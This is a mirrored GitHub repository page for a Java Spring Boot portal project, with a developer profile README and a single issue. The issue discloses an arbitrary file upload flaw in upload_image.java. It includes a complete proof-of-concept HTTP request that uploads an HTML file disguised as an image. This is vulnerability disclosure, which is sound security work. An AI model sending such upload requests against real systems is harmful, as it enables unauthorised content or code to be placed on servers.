Giter Site home page Giter Site logo

portalwebsitesystem's Introduction

🐱‍👓空想家 (●'◡'●) You are welcome to come

personal website(个人网站): 空想家

GitHub Thaiane Actions Status Actions Status

About me🏆...

  • 🛷 Learn all the interesting knowledge
  • 🃏Efforts are being made to improve code quality and development capability
  • 🧿Desire to develop a high-quality open source project
  • 💬 Ask me about anything tech related, I am happy to help

Don't restrict yourself. We can do unlimited things with limited life :)

🔧 Technologies & Tools

Java JavaScript Python MySQL Redis ElasticSearch RabbitMQ Tomcat Spring Springboot SpringSecurity Consul Swagger Vue NodeJs Webpack Linux Docker ContOS Nginx Git ......

I'm a Night 🦉

🌞 Morning    33 commits     █░░░░░░░░░░░░░░░░░░░░░░░░   5.22% 
🌆 Daytime    268 commits    ██████████░░░░░░░░░░░░░░░   42.41% 
🌃 Evening    224 commits    ████████░░░░░░░░░░░░░░░░░   35.44% 
🌙 Night      107 commits    ████░░░░░░░░░░░░░░░░░░░░░   16.93%

portalwebsitesystem's People

Contributors

wql-kxj avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

portalwebsitesystem's Issues

There is an Arbitrary File Upload in src/main/java/com/wuhao/wuhaozn_springboot/control/upload_image.java

The system does not detect file suffixes uploaded by users, resulting in arbitrary file upload vulnerabilities.
0

main data package:

POST /upload_image HTTP/1.1
Host: 10.25.10.161:8181
Content-Length: 249
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKFB0HQ4zX4BVqzPM
Origin: http://10.25.10.161:8181
Referer: http://10.25.10.161:8181/company
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B7449A405FFEABFC4AC760AC694C8F4A
Connection: close

------WebKitFormBoundaryKFB0HQ4zX4BVqzPM
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: image/jpeg

<html><title>test</title><body><h1>this is a test!</h1></body></html>
------WebKitFormBoundaryKFB0HQ4zX4BVqzPM--

1

You can see that the file was successfully uploaded and can be accessed directly.

2

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.